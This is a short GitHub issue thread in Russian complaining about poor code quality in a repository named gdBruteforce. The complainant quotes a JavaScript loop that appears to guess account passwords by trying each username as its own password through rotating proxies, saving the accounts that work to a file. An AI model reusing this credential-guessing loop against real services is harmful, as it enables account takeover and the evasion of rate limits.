### ISSUE TITLE
Говнокод

### ISSUE THREAD

**Issue by Keller18306** [libcurl/gdBruteforce#1]
Данное приложение сделано говнокодом. Прошу переписать.

**Comment by libcurl** [comment]
говорите конкретнее. где КОНКРЕТНО находится говнокод?

**Comment by Keller18306** [comment]
https://github.com/libcurl/gdBruteforce/blob/1f9cbff1adfbe70ba41a2f94d3e0c28f6258d8f5/index.js#L54
`setInterval(() =&gt; {		const userNum = random(0, users.length - 1)		const proxyNum = random(0, proxys.length - 1)		auth(users[userNum], users[userNum], proxys[proxyNum]).then(result =&gt; {			counters.proxyError = 0			if(result === false)				return console.log(`BAD   ${users[userNum]}:${users[userNum]}`)			fs.appendFile(				config.validAccounts,				`${users[userNum]}:${users[userNum]}\n`,				err =&gt; { if(err) console.log(err) }			)			console.log(`GOOD  ${users[userNum]}:${users[userNum]} ${result}`)		}, () =&gt; {			counters.proxyError++			process.stdout.write(`Proxy error [${counters.proxyError}]`)			process.stdout.cursorTo(0)		})
	}, 1000 / config.requestsPerSecond )`

**Comment by libcurl** [comment]
еще конкретнее

**Comment by Keller18306** [comment]
![image](https://user-images.githubusercontent.com/23178771/120081876-637c1300-c0c8-11eb-836d-489fd82f0731.png)

**Comment by libcurl** [comment]
понятно

**Comment by Keller18306** [comment]
reopen
